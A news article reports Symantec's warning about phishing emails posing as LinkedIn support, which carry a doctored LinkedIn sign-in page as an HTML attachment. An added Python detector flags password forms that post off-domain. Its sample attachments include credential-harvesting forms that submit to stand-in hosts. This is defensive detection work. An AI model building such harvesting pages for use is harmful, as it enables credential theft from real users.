Cyber-criminals are now targeting LinkedIn users with emails that claim to come from the support team of the world’s largest professional networking firm and trick recipients into sharing their credentials, security software firm Symantec warned.

Founded in 2003, LinkedIn has over 300 million members globally, of which more than 26 million users are in India (as of June 2014). Symantec said that over the last week it has observed an increase in phishing emails claiming to be from the US-based firm’s support team.

No immediate response was available from LinkedIn.

“The body of the email claims that irregular activities have prompted a ‘compulsory security update’ for the recipients’ LinkedIn account,” Symantec said.

The email goes on to say that in order to secure their account, the recipient needs to download the attached form (an HTML attachment) and follow the instructions, it added.

The attachment is a copy of the real LinkedIn.com website, it said.

“However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” Symantec warned.

The email uses a lowercase ‘i’ to spell LinkedIn, instead of capital ‘I’ as used by the firm.

“The difference in characters is indiscernible to the eye and functions as a way to evade mail filters. Also, the HTML attachment method bypasses browser blacklists that often flag suspicious websites to help prevent users from being phished,” Symantec said.
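
Because the attachment is opened from disk and never passes a browser blacklist, one place to catch it is at the mail gateway, by looking at where its sign-in form submits. The following is an added example, not code from Symantec or from the original article: it parses an HTML attachment and reports password forms whose target is not an HTTPS URL on the expected domain. The `TRUSTED` list, the function names and the sample attachments are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = ("linkedin.com",)  # assumption: domains a real sign-in form may post to

# Constructed sample attachments (not taken from the campaign).
SAMPLE_PHISH = """<html><body><form method="post" action="http://collector.example/save.php">
<input type="text" name="email"><input type="password" name="pw"/></form></body></html>"""
SAMPLE_LOOKALIKE = """<form action="https://linkedin.com.login.example/submit">
<input type="PASSWORD" name="pw"></form>"""
SAMPLE_OK = """<form action="https://www.linkedin.com/login"><input type="password" name="pw"></form>"""


class _FormScanner(HTMLParser):
    """Record each <form> action and whether the form contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []    # [action, has_password] per form
        self._open = None  # form currently being parsed

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._open = [(attrs.get("action") or "").strip(), False]
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._open[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def _trusted(host, trusted):
    # Exact match or a true subdomain; "linkedin.com.login.example" must not pass.
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in trusted)


def suspicious_forms(html, trusted=TRUSTED):
    """Return the actions of password forms that do not post over HTTPS to a trusted domain."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    # An empty or relative action is flagged too: a local file has no legitimate server behind it.
    return [action for action, has_pw in scanner.forms
            if has_pw and (urlparse(action).scheme != "https"
                           or not _trusted(urlparse(action).hostname, trusted))]
```

Form actions are only one way a modified page can send data out, so an empty result does not clear an attachment.
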

The security firm said LinkedIn users should consider turning on two-step verification, as this would prevent an attacker from accessing the account even if a user’s credentials are compromised.